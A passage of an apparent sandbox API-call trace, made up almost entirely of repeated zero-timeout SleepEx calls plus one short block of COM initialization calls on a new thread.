(dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.433] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.434] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.435] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.436] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.438] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.438] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.438] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.438] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.441] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.441] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.441] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.441] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.456] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.459] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.542] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.588] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.636] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.259] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.311] SleepEx (dwMilliseconds=0x0, bAlertable=0) Thread: id = 1398 os_tid = 0xe40 Thread: id = 1399 os_tid = 0x4a0 [0246.684] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0246.684] CoGetContextToken (in: pToken=0x5ecf314 | out: pToken=0x5ecf314) returned 0x0 [0246.684] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ecf338 | out: ppvObject=0x5ecf338*=0x6ded34) returned 0x0 [0246.685] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x5ecf364 | out: pThreadType=0x5ecf364*=0) returned 0x0 [0246.685] IUnknown:Release (This=0x6ded34) returned 0x1 [0246.685] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0246.685] CoUninitialize () [0246.686] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.693] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.701] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.711] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.739] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.739] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.739] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.740] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.742] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.742] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.742] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.743] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.743] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.743] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.744] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.744] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.744] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.745] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.745] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.746] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.749] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.749] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.758] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.804] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.812] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.815] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.818] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.823] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.825] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.835] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.867] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.885] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.886] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.887] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.888] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.888] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.890] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.899] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.903] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.905] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.907] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.910] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.911] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.914] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.967] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.988] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.023] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.066] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.123] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.162] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.169] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.215] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.257] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.309] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.351] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.405] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.444] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.446] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.471] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.513] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.525] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.574] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.644] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.690] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.726] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.773] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.818] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.865] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.903] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.905] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.990] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.050] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.084] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.130] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.178] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.224] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.271] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.318] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.353] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.396] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.442] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.490] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.541] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.594] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.646] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.692] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.739] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.786] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.837] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.881] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.926] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.973] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.020] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.059] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.098] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.140] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.176] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.223] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.270] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.332] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.378] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.426] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.472] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.566] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.675] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.722] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.769] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.782] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.798] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.800] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.847] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.142] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.143] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.144] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.145] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.159] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.174] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.178] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.184] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.192] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.198] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.200] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.205] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.210] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.211] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.215] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.220] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.223] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.226] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.230] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.231] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.233] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.237] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.260] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.265] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.267] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.267] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.273] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.276] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.280] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.285] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.286] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.289] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.290] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.293] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.294] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.297] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.299] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.301] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.302] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.304] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.306] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.307] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.308] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.316] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.322] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.333] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.335] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.341] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.344] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.348] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.349] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.350] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.355] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.357] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.360] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.362] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.363] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.367] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.368] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.370] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.371] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.374] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.375] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.377] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.187] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.190] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.192] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.198] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.202] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.202] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.202] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.203] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.203] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.204] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.216] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.219] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.219] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.219] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.219] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.219] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.220] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.220] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.221] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.221] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.222] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.267] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.310] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.352] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.388] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.435] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.481] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.528] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.575] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.629] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.685] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.731] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.778] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.824] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.871] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.918] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.946] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.971] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.973] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.977] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.979] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.980] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.982] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.987] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.989] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.995] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.999] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.005] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.008] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.014] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.023] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.023] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.024] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.024] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.024] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.024] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.024] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.088] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.090] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.090] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.092] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.092] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.092] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.096] 